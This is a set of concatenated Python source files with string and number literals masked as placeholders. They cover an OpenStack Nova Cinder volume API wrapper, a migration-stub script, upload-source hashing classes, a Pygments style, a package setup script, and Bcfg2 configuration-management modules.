<EOL> six . reraise ( exc_value , None , exc_trace ) <EOL> return res <EOL> return translate_cinder_exception ( wrapper ) <EOL> def translate_snapshot_exception ( method ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( self , ctx , snapshot_id , * args , ** kwargs ) : <EOL> try : <EOL> res = method ( self , ctx , snapshot_id , * args , ** kwargs ) <EOL> except ( cinder_exception . ClientException , <EOL> keystone_exception . ClientException ) : <EOL> exc_type , exc_value , exc_trace = sys . exc_info ( ) <EOL> if isinstance ( exc_value , ( keystone_exception . NotFound , <EOL> cinder_exception . NotFound ) ) : <EOL> exc_value = exception . SnapshotNotFound ( snapshot_id = snapshot_id ) <EOL> six . reraise ( exc_value , None , exc_trace ) <EOL> return res <EOL> return translate_cinder_exception ( wrapper ) <EOL> class API ( object ) : <EOL> """<STR_LIT>""" <EOL> @ translate_volume_exception <EOL> def get ( self , context , volume_id ) : <EOL> item = cinderclient ( context ) . volumes . get ( volume_id ) <EOL> return _untranslate_volume_summary_view ( context , item ) <EOL> @ translate_cinder_exception <EOL> def get_all ( self , context , search_opts = None ) : <EOL> search_opts = search_opts or { } <EOL> items = cinderclient ( context ) . volumes . list ( detailed = True , <EOL> search_opts = search_opts ) <EOL> rval = [ ] <EOL> for item in items : <EOL> rval . append ( _untranslate_volume_summary_view ( context , item ) ) <EOL> return rval <EOL> def check_attached ( self , context , volume ) : <EOL> if volume [ '<STR_LIT:status>' ] != "<STR_LIT>" : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % { "<STR_LIT>" : volume [ '<STR_LIT:id>' ] , <EOL> "<STR_LIT:status>" : volume [ '<STR_LIT:status>' ] } <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> def check_attach ( self , context , volume , instance = None ) : <EOL> if volume [ '<STR_LIT:status>' ] != "<STR_LIT>" : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % { '<STR_LIT>' : volume [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:status>' : volume [ '<STR_LIT:status>' ] } <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> if volume [ '<STR_LIT>' ] == "<STR_LIT>" : <EOL> msg = _ ( "<STR_LIT>" ) % volume [ '<STR_LIT:id>' ] <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> if instance and not CONF . cinder . cross_az_attach : <EOL> instance_az = az . get_instance_availability_zone ( context , instance ) <EOL> if instance_az != volume [ '<STR_LIT>' ] : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % { <EOL> "<STR_LIT>" : instance [ '<STR_LIT:id>' ] , <EOL> "<STR_LIT>" : volume [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : instance_az , <EOL> '<STR_LIT>' : volume [ '<STR_LIT>' ] } <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> def check_detach ( self , context , volume , instance = None ) : <EOL> if volume [ '<STR_LIT:status>' ] == "<STR_LIT>" : <EOL> msg = _ ( "<STR_LIT>" ) % volume [ '<STR_LIT:id>' ] <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> if volume [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exception . InvalidVolume ( reason = msg ) <EOL> if instance is not None and instance . uuid not in volume [ '<STR_LIT>' ] : <EOL> raise exception . VolumeUnattached ( volume_id = volume [ '<STR_LIT:id>' ] ) <EOL> @ translate_volume_exception <EOL> def reserve_volume ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . reserve ( volume_id ) <EOL> @ translate_volume_exception <EOL> def unreserve_volume ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . unreserve ( volume_id ) <EOL> @ translate_volume_exception <EOL> def begin_detaching ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . begin_detaching ( volume_id ) <EOL> @ translate_volume_exception <EOL> def roll_detaching ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . roll_detaching ( volume_id ) <EOL> @ translate_volume_exception <EOL> def attach ( self , context , volume_id , instance_uuid , mountpoint , mode = '<STR_LIT>' ) : <EOL> cinderclient ( context ) . volumes . attach ( volume_id , instance_uuid , <EOL> mountpoint , mode = mode ) <EOL> @ translate_volume_exception <EOL> def detach ( self , context , volume_id , instance_uuid = None , <EOL> attachment_id = None ) : <EOL> if attachment_id is None : <EOL> volume = self . get ( context , volume_id ) <EOL> if volume [ '<STR_LIT>' ] : <EOL> attachments = volume . get ( '<STR_LIT>' , { } ) <EOL> if instance_uuid : <EOL> attachment_id = attachments . get ( instance_uuid , { } ) . get ( '<STR_LIT>' ) <EOL> if not attachment_id : <EOL> LOG . warning ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : volume_id , <EOL> '<STR_LIT>' : instance_uuid } ) <EOL> else : <EOL> LOG . warning ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : volume_id } ) <EOL> cinderclient ( context ) . volumes . detach ( volume_id , attachment_id ) <EOL> @ translate_volume_exception <EOL> def initialize_connection ( self , context , volume_id , connector ) : <EOL> try : <EOL> connection_info = cinderclient ( <EOL> context ) . volumes . initialize_connection ( volume_id , connector ) <EOL> connection_info [ '<STR_LIT>' ] = connector <EOL> return connection_info <EOL> except cinder_exception . ClientException as ex : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> LOG . error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : volume_id , <EOL> '<STR_LIT:host>' : connector . get ( '<STR_LIT:host>' ) , <EOL> '<STR_LIT>' : six . text_type ( ex ) , <EOL> '<STR_LIT:code>' : ex . code } ) <EOL> try : <EOL> self . terminate_connection ( context , volume_id , connector ) <EOL> except Exception as exc : <EOL> LOG . error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : volume_id , <EOL> '<STR_LIT:host>' : connector . get ( '<STR_LIT:host>' ) , <EOL> '<STR_LIT>' : six . text_type ( exc ) , <EOL> '<STR_LIT:code>' : exc . code } ) <EOL> @ translate_volume_exception <EOL> def terminate_connection ( self , context , volume_id , connector ) : <EOL> return cinderclient ( context ) . volumes . terminate_connection ( volume_id , <EOL> connector ) <EOL> @ translate_cinder_exception <EOL> def migrate_volume_completion ( self , context , old_volume_id , new_volume_id , <EOL> error = False ) : <EOL> return cinderclient ( context ) . volumes . migrate_volume_completion ( <EOL> old_volume_id , new_volume_id , error ) <EOL> @ translate_cinder_exception <EOL> def create ( self , context , size , name , description , snapshot = None , <EOL> image_id = None , volume_type = None , metadata = None , <EOL> availability_zone = None ) : <EOL> client = cinderclient ( context ) <EOL> if snapshot is not None : <EOL> snapshot_id = snapshot [ '<STR_LIT:id>' ] <EOL> else : <EOL> snapshot_id = None <EOL> kwargs = dict ( snapshot_id = snapshot_id , <EOL> volume_type = volume_type , <EOL> user_id = context . user_id , <EOL> project_id = context . project_id , <EOL> availability_zone = availability_zone , <EOL> metadata = metadata , <EOL> imageRef = image_id ) <EOL> if isinstance ( client , v1_client . Client ) : <EOL> kwargs [ '<STR_LIT>' ] = name <EOL> kwargs [ '<STR_LIT>' ] = description <EOL> else : <EOL> kwargs [ '<STR_LIT:name>' ] = name <EOL> kwargs [ '<STR_LIT:description>' ] = description <EOL> try : <EOL> item = client . volumes . create ( size , ** kwargs ) <EOL> return _untranslate_volume_summary_view ( context , item ) <EOL> except cinder_exception . OverLimit : <EOL> raise exception . OverQuota ( overs = '<STR_LIT>' ) <EOL> @ translate_volume_exception <EOL> def delete ( self , context , volume_id ) : <EOL> cinderclient ( context ) . volumes . delete ( volume_id ) <EOL> @ translate_volume_exception <EOL> def update ( self , context , volume_id , fields ) : <EOL> raise NotImplementedError ( ) <EOL> @ translate_snapshot_exception <EOL> def get_snapshot ( self , context , snapshot_id ) : <EOL> item = cinderclient ( context ) . volume_snapshots . get ( snapshot_id ) <EOL> return _untranslate_snapshot_summary_view ( context , item ) <EOL> @ translate_cinder_exception <EOL> def get_all_snapshots ( self , context ) : <EOL> items = cinderclient ( context ) . volume_snapshots . list ( detailed = True ) <EOL> rvals = [ ] <EOL> for item in items : <EOL> rvals . append ( _untranslate_snapshot_summary_view ( context , item ) ) <EOL> return rvals <EOL> @ translate_volume_exception <EOL> def create_snapshot ( self , context , volume_id , name , description ) : <EOL> item = cinderclient ( context ) . volume_snapshots . create ( volume_id , <EOL> False , <EOL> name , <EOL> description ) <EOL> return _untranslate_snapshot_summary_view ( context , item ) <EOL> @ translate_volume_exception <EOL> def create_snapshot_force ( self , context , volume_id , name , description ) : <EOL> item = cinderclient ( context ) . volume_snapshots . create ( volume_id , <EOL> True , <EOL> name , <EOL> description ) <EOL> return _untranslate_snapshot_summary_view ( context , item ) <EOL> @ translate_snapshot_exception <EOL> def delete_snapshot ( self , context , snapshot_id ) : <EOL> cinderclient ( context ) . volume_snapshots . delete ( snapshot_id ) <EOL> @ translate_cinder_exception <EOL> def get_volume_encryption_metadata ( self , context , volume_id ) : <EOL> return cinderclient ( context ) . volumes . get_encryption_metadata ( volume_id ) <EOL> @ translate_snapshot_exception <EOL> def update_snapshot_status ( self , context , snapshot_id , status ) : <EOL> vs = cinderclient ( context ) . volume_snapshots <EOL> vs . update_snapshot_status ( <EOL> snapshot_id , <EOL> { '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ) </s>
<s> import argparse <EOL> import glob <EOL> import os <EOL> import subprocess <EOL> BASE = '<STR_LIT>' . split ( '<STR_LIT:/>' ) <EOL> API_BASE = '<STR_LIT>' . split ( '<STR_LIT:/>' ) <EOL> STUB = """<STR_LIT>""" <EOL> def get_last_migration ( base ) : <EOL> path = os . path . join ( * tuple ( base + [ '<STR_LIT>' ] ) ) <EOL> migrations = sorted ( [ os . path . split ( fn ) [ - <NUM_LIT:1> ] for fn in glob . glob ( path ) ] ) <EOL> return int ( migrations [ - <NUM_LIT:1> ] . split ( '<STR_LIT:_>' ) [ <NUM_LIT:0> ] ) <EOL> def reserve_migrations ( base , number , git_add ) : <EOL> last = get_last_migration ( base ) <EOL> for i in range ( last + <NUM_LIT:1> , last + number + <NUM_LIT:1> ) : <EOL> name = '<STR_LIT>' % i <EOL> path = os . path . join ( * tuple ( base + [ name ] ) ) <EOL> with open ( path , '<STR_LIT:w>' ) as f : <EOL> f . write ( STUB ) <EOL> print ( '<STR_LIT>' % path ) <EOL> if git_add : <EOL> subprocess . call ( '<STR_LIT>' % path , shell = True ) <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , default = <NUM_LIT:10> , <EOL> type = int , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT>' , <EOL> const = True , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT>' , <EOL> const = True , default = False , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> if args . api : <EOL> base = API_BASE <EOL> else : <EOL> base = BASE <EOL> reserve_migrations ( base , args . number , args . git_add ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import hashlib <EOL> import os <EOL> from abc import ( ABCMeta , abstractmethod ) <EOL> import six <EOL> from . utils import ( BytesIoContextManager , hex_sha1_of_stream ) <EOL> @ six . add_metaclass ( ABCMeta ) <EOL> class AbstractUploadSource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def get_content_length ( self ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def get_content_sha1 ( self ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def open ( self ) : <EOL> """<STR_LIT>""" <EOL> class UploadSourceBytes ( AbstractUploadSource ) : <EOL> def __init__ ( self , data_bytes ) : <EOL> self . data_bytes = data_bytes <EOL> def get_content_length ( self ) : <EOL> return len ( self . data_bytes ) <EOL> def get_content_sha1 ( self ) : <EOL> return hashlib . sha1 ( self . data_bytes ) . hexdigest ( ) <EOL> def open ( self ) : <EOL> return BytesIoContextManager ( self . data_bytes ) <EOL> class UploadSourceLocalFile ( AbstractUploadSource ) : <EOL> def __init__ ( self , local_path , content_sha1 = None ) : <EOL> self . local_path = local_path <EOL> self . content_length = os . path . getsize ( local_path ) <EOL> self . content_sha1 = content_sha1 <EOL> def get_content_length ( self ) : <EOL> return self . content_length <EOL> def get_content_sha1 ( self ) : <EOL> if self . content_sha1 is None : <EOL> self . content_sha1 = self . _hex_sha1_of_file ( self . local_path ) <EOL> return self . content_sha1 <EOL> def open ( self ) : <EOL> return open ( self . local_path , '<STR_LIT:rb>' ) <EOL> def _hex_sha1_of_file ( self , local_path ) : <EOL> with open ( local_path , '<STR_LIT:rb>' ) as f : <EOL> return hex_sha1_of_stream ( f , self . content_length ) </s>
<s> from pygments . style import Style <EOL> from pygments . token import Keyword , Name , Comment , String , Error , Number , Operator , Generic , Whitespace , Punctuation , Other , Literal <EOL> class KayleeStyle ( Style ) : <EOL> background_color = "<STR_LIT>" <EOL> default_style = "<STR_LIT>" <EOL> styles = { <EOL> Whitespace : "<STR_LIT>" , <EOL> Error : "<STR_LIT>" , <EOL> Other : "<STR_LIT>" , <EOL> Comment : "<STR_LIT>" , <EOL> Comment . Preproc : "<STR_LIT>" , <EOL> Keyword : "<STR_LIT>" , <EOL> Keyword . Constant : "<STR_LIT>" , <EOL> Keyword . Declaration : "<STR_LIT>" , <EOL> Keyword . Namespace : "<STR_LIT>" , <EOL> Keyword . Pseudo : "<STR_LIT>" , <EOL> Keyword . Reserved : "<STR_LIT>" , <EOL> Keyword . Type : "<STR_LIT>" , <EOL> Operator : "<STR_LIT>" , <EOL> Operator . Word : "<STR_LIT>" , <EOL> Punctuation : "<STR_LIT>" , <EOL> Name : "<STR_LIT>" , <EOL> Name . Attribute : "<STR_LIT>" , <EOL> Name . Builtin : "<STR_LIT>" , <EOL> Name . Builtin . Pseudo : "<STR_LIT>" , <EOL> Name . Class : "<STR_LIT>" , <EOL> Name . Constant : "<STR_LIT>" , <EOL> Name . Decorator : "<STR_LIT>" , <EOL> Name . Entity : "<STR_LIT>" , <EOL> Name . Exception : "<STR_LIT>" , <EOL> Name . Function : "<STR_LIT>" , <EOL> Name . Property : "<STR_LIT>" , <EOL> Name . Label : "<STR_LIT>" , <EOL> Name . Namespace : "<STR_LIT>" , <EOL> Name . Other : "<STR_LIT>" , <EOL> Name . Tag : "<STR_LIT>" , <EOL> Name . Variable : "<STR_LIT>" , <EOL> Name . Variable . Class : "<STR_LIT>" , <EOL> Name . Variable . Global : "<STR_LIT>" , <EOL> Name . Variable . Instance : "<STR_LIT>" , <EOL> Number : "<STR_LIT>" , <EOL> Literal : "<STR_LIT>" , <EOL> Literal . Date : "<STR_LIT>" , <EOL> String : "<STR_LIT>" , <EOL> String . Backtick : "<STR_LIT>" , <EOL> String . Char : "<STR_LIT>" , <EOL> String . Doc : "<STR_LIT>" , <EOL> String . Double : "<STR_LIT>" , <EOL> String . Escape : "<STR_LIT>" , <EOL> String . Heredoc : "<STR_LIT>" , <EOL> String . Interpol : "<STR_LIT>" , <EOL> String . Other : "<STR_LIT>" , <EOL> String . Regex : "<STR_LIT>" , <EOL> String . Single : "<STR_LIT>" , <EOL> String . Symbol : "<STR_LIT>" , <EOL> Generic : "<STR_LIT>" , <EOL> Generic . Deleted : "<STR_LIT>" , <EOL> Generic . Emph : "<STR_LIT>" , <EOL> Generic . Error : "<STR_LIT>" , <EOL> Generic . Heading : "<STR_LIT>" , <EOL> Generic . Inserted : "<STR_LIT>" , <EOL> Generic . Output : "<STR_LIT>" , <EOL> Generic . Prompt : "<STR_LIT>" , <EOL> Generic . Strong : "<STR_LIT>" , <EOL> Generic . Subheading : "<STR_LIT>" , <EOL> Generic . Traceback : "<STR_LIT>" , <EOL> } </s>
<s> import os <EOL> from setuptools import setup <EOL> import kaylee <EOL> def fullsplit ( path , result = None ) : <EOL> """<STR_LIT>""" <EOL> if result is None : <EOL> result = [ ] <EOL> head , tail = os . path . split ( path ) <EOL> if head == '<STR_LIT>' : <EOL> return [ tail ] + result <EOL> if head == path : <EOL> return result <EOL> return fullsplit ( head , [ tail ] + result ) <EOL> EXCLUDE_FROM_PACKAGES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def is_package ( package_name ) : <EOL> for pkg in EXCLUDE_FROM_PACKAGES : <EOL> if package_name . startswith ( pkg ) : <EOL> return False <EOL> return True <EOL> root_dir = os . path . dirname ( __file__ ) <EOL> if root_dir != '<STR_LIT>' : <EOL> os . chdir ( root_dir ) <EOL> kaylee_dir = '<STR_LIT>' <EOL> packages , package_data = [ ] , { } <EOL> for dirpath , dirnames , filenames in os . walk ( kaylee_dir ) : <EOL> dirnames [ : ] = [ d for d in dirnames if not d . startswith ( '<STR_LIT:.>' ) and d != '<STR_LIT>' ] <EOL> parts = fullsplit ( dirpath ) <EOL> package_name = '<STR_LIT:.>' . join ( parts ) <EOL> if '<STR_LIT>' in filenames and is_package ( package_name ) : <EOL> packages . append ( package_name ) <EOL> elif filenames : <EOL> relative_path = [ ] <EOL> while '<STR_LIT:.>' . join ( parts ) not in packages : <EOL> relative_path . append ( parts . pop ( ) ) <EOL> relative_path . reverse ( ) <EOL> path = os . path . join ( * relative_path ) <EOL> package_files = package_data . setdefault ( '<STR_LIT:.>' . join ( parts ) , [ ] ) <EOL> package_files . extend ( [ os . path . join ( path , f ) for f in filenames ] ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = kaylee . __version__ , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> packages = packages , <EOL> package_data = package_data , <EOL> zip_safe = False , <EOL> scripts = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from Bcfg2 . Client . Tools . POSIX . base import POSIXTool <EOL> class POSIXNonexistent ( POSIXTool ) : <EOL> """<STR_LIT>""" <EOL> __req__ = [ '<STR_LIT:name>' ] <EOL> def verify ( self , entry , _ ) : <EOL> if os . path . lexists ( entry . get ( '<STR_LIT:name>' ) ) : <EOL> self . logger . debug ( "<STR_LIT>" % <EOL> entry . get ( "<STR_LIT:name>" ) ) <EOL> return False <EOL> return True <EOL> def install ( self , entry ) : <EOL> ename = entry . get ( '<STR_LIT:name>' ) <EOL> recursive = entry . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) == '<STR_LIT:true>' <EOL> if recursive : <EOL> for struct in self . config . getchildren ( ) : <EOL> for el in struct . getchildren ( ) : <EOL> if ( el . tag == '<STR_LIT>' and <EOL> el . get ( '<STR_LIT:type>' ) != '<STR_LIT>' and <EOL> el . get ( '<STR_LIT:name>' ) . startswith ( ename ) ) : <EOL> self . logger . error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ename ) <EOL> return False <EOL> try : <EOL> self . _remove ( entry , recursive = recursive ) <EOL> return True <EOL> except OSError : <EOL> err = sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> self . logger . error ( '<STR_LIT>' % ( ename , err ) ) <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import copy <EOL> import fnmatch <EOL> import os <EOL> import sys <EOL> from Bcfg2 . Options import Types <EOL> from Bcfg2 . Compat import ConfigParser <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> unit_test = False <EOL> def _debug ( msg ) : <EOL> """<STR_LIT>""" <EOL> if unit_test : <EOL> print ( "<STR_LIT>" % msg ) <EOL> elif os . environ . get ( '<STR_LIT>' , '<STR_LIT:0>' ) . lower ( ) in [ "<STR_LIT:true>" , "<STR_LIT:yes>" , <EOL> "<STR_LIT>" , "<STR_LIT:1>" ] : <EOL> sys . stderr . write ( "<STR_LIT>" % msg ) <EOL> _action_map = dict ( ) <EOL> def _get_action_class ( action_name ) : <EOL> """<STR_LIT>""" <EOL> if ( isinstance ( action_name , type ) and <EOL> issubclass ( action_name , argparse . Action ) ) : <EOL> return action_name <EOL> if action_name not in _action_map : <EOL> action = argparse . ArgumentParser ( ) . add_argument ( action_name , <EOL> action = action_name ) <EOL> _action_map [ action_name ] = action . __class__ <EOL> return _action_map [ action_name ] <EOL> class Option ( object ) : <EOL> """<STR_LIT>""" <EOL> _local_args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . args = args <EOL> self . _kwargs = kwargs <EOL> self . cf = None <EOL> self . env = None <EOL> self . man = None <EOL> self . parsers = [ ] <EOL> self . actions = dict ( ) <EOL> self . type = self . _kwargs . get ( "<STR_LIT:type>" ) <EOL> self . help = self . _kwargs . get ( "<STR_LIT>" ) <EOL> self . _default = self . _kwargs . get ( "<STR_LIT:default>" ) <EOL> for kwarg in self . _local_args : <EOL> setattr ( self , kwarg , self . _kwargs . pop ( kwarg , None ) ) <EOL> if self . args : <EOL> self . _dest = None <EOL> else : <EOL> action_cls = _get_action_class ( self . _kwargs . get ( '<STR_LIT:action>' , '<STR_LIT:store>' ) ) <EOL> self . _dest = None <EOL> if '<STR_LIT>' in self . _kwargs : <EOL> self . _dest = self . _kwargs . pop ( '<STR_LIT>' ) <EOL> elif self . env is not None : <EOL> self . _dest = self . env <EOL> elif self . cf is not None : <EOL> self . _dest = self . cf [ <NUM_LIT:1> ] <EOL> self . _dest = self . _dest . lower ( ) . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) <EOL> kwargs = copy . copy ( self . _kwargs ) <EOL> kwargs . pop ( "<STR_LIT:action>" , None ) <EOL> self . actions [ None ] = action_cls ( self . _dest , self . _dest , ** kwargs ) <EOL> def __repr__ ( self ) : <EOL> sources = [ ] <EOL> if self . args : <EOL> sources . extend ( self . args ) <EOL> if self . cf : <EOL> sources . append ( "<STR_LIT>" % self . cf ) <EOL> if self . env : <EOL> sources . append ( "<STR_LIT:$>" + self . env ) <EOL> spec = [ "<STR_LIT>" % sources , "<STR_LIT>" % self . default , <EOL> "<STR_LIT>" % len ( self . parsers ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , <EOL> self . dest , "<STR_LIT:U+002CU+0020>" . join ( spec ) ) <EOL> def list_options ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ self ] <EOL> def finalize ( self , namespace ) : <EOL> """<STR_LIT>""" <EOL> for parser , action in self . actions . items ( ) : <EOL> if hasattr ( action , "<STR_LIT>" ) : <EOL> if parser : <EOL> _debug ( "<STR_LIT>" % ( self , parser ) ) <EOL> else : <EOL> _debug ( "<STR_LIT>" % self ) <EOL> action . finalize ( parser , namespace ) <EOL> @ property <EOL> def _type_func ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . type : <EOL> return self . type <EOL> else : <EOL> return lambda x : x <EOL> def from_config ( self , cfp ) : <EOL> """<STR_LIT>""" <EOL> if not self . cf : <EOL> return None <EOL> if '<STR_LIT:*>' in self . cf [ <NUM_LIT:1> ] : <EOL> if cfp . has_section ( self . cf [ <NUM_LIT:0> ] ) : <EOL> exclude = set ( ) <EOL> for parser in self . parsers : <EOL> exclude . update ( o . cf [ <NUM_LIT:1> ] <EOL> for o in parser . option_list <EOL> if o . cf and o . cf [ <NUM_LIT:0> ] == self . cf [ <NUM_LIT:0> ] ) <EOL> rv = dict ( [ ( o , cfp . get ( self . cf [ <NUM_LIT:0> ] , o ) ) <EOL> for o in fnmatch . filter ( cfp . options ( self . cf [ <NUM_LIT:0> ] ) , <EOL> self . cf [ <NUM_LIT:1> ] ) <EOL> if o not in exclude ] ) <EOL> else : <EOL> rv = { } <EOL> else : <EOL> try : <EOL> rv = self . _type_func ( self . get_config_value ( cfp ) ) <EOL> except ( ConfigParser . NoSectionError , ConfigParser . NoOptionError ) : <EOL> rv = None <EOL> _debug ( "<STR_LIT>" % ( self , rv ) ) <EOL> return rv <EOL> def get_config_value ( self , cfp ) : <EOL> """<STR_LIT>""" <EOL> return cfp . get ( * self . cf ) <EOL> def get_environ_value ( self , value ) : <EOL> """<STR_LIT>""" <EOL> return value <EOL> def default_from_config ( self , cfp ) : <EOL> """<STR_LIT>""" <EOL> if self . env and self . env in os . environ : <EOL> self . default = self . _type_func ( <EOL> self . get_environ_value ( os . environ [ self . env ] ) ) <EOL> _debug ( "<STR_LIT>" % <EOL> ( self , self . default ) ) <EOL> else : <EOL> val = self . from_config ( cfp ) <EOL> if val is not None : <EOL> _debug ( "<STR_LIT>" % <EOL> ( self , val ) ) <EOL> self . default = val <EOL> def _get_default ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default <EOL> def _set_default ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _default = value <EOL> for action in self . actions . values ( ) : <EOL> action . default = value <EOL> default = property ( _get_default , _set_default ) <EOL> def _get_dest ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _dest <EOL> def _set_dest ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _dest = value <EOL> for action in self . actions . values ( ) : <EOL> action . dest = value <EOL> def early_parsing_hook ( self , early_opts ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> dest = property ( _get_dest , _set_dest ) <EOL> def add_to_parser ( self , parser ) : <EOL> """<STR_LIT>""" <EOL> self . parsers . append ( parser ) <EOL> if self . args : <EOL> _debug ( "<STR_LIT>" % ( self , parser ) ) <EOL> action = parser . add_argument ( * self . args , ** self . _kwargs ) <EOL> if not self . _dest : <EOL> self . _dest = action . dest <EOL> if self . _default : <EOL> action . default = self . _default <EOL> self . actions [ parser ] = action <EOL> else : <EOL> _debug ( "<STR_LIT>" % <EOL> ( self , parser ) ) <EOL> class RepositoryMacroOption ( Option ) : <EOL> """<STR_LIT>""" <EOL> repository = None <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . _original_type = kwargs . pop ( '<STR_LIT:type>' , lambda x : x ) <EOL> kwargs [ '<STR_LIT:type>' ] = self . _type <EOL> kwargs . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Option . __init__ ( self , * args , ** kwargs ) <EOL> def early_parsing_hook ( self , early_opts ) : <EOL> if hasattr ( early_opts , "<STR_LIT>" ) : <EOL> if self . __class__ . repository is None : <EOL> _debug ( "<STR_LIT>" % <EOL> ( early_opts . repository , self . __class__ . __name__ ) ) <EOL> self . __class__ . repository = early_opts . repository <EOL> else : <EOL> _debug ( "<STR_LIT>" % self . __class__ ) <EOL> def _get_default ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self . _default , "<STR_LIT:replace>" ) : <EOL> return self . _default <EOL> else : <EOL> return self . _type ( self . _default ) <EOL> default = property ( _get_default , Option . _set_default ) <EOL> def transform_value ( self , value ) : <EOL> """<STR_LIT>""" <EOL> return value <EOL> def _type ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if self . __class__ . repository is None : <EOL> return value <EOL> else : <EOL> return self . _original_type ( self . transform_value ( <EOL> value . replace ( "<STR_LIT>" , self . __class__ . repository ) ) ) <EOL> class PathOption ( RepositoryMacroOption ) : <EOL> """<STR_LIT>""" <EOL> def transform_value ( self , value ) : <EOL> return Types . path ( value ) <EOL> class _BooleanOptionAction ( argparse . Action ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> argparse . Action . __init__ ( self , * args , ** kwargs ) <EOL> self . original = self . default <EOL> def __call__ ( self , parser , namespace , values , option_string = None ) : <EOL> if values is None : <EOL> setattr ( namespace , self . dest , self . default ) <EOL> elif option_string is not None : <EOL> setattr ( namespace , self . dest , not self . original ) <EOL> else : <EOL> setattr ( namespace , self . dest , bool ( values ) ) <EOL> class BooleanOption ( Option ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT:action>' , _BooleanOptionAction ) <EOL> kwargs . setdefault ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> kwargs . setdefault ( '<STR_LIT:default>' , False ) 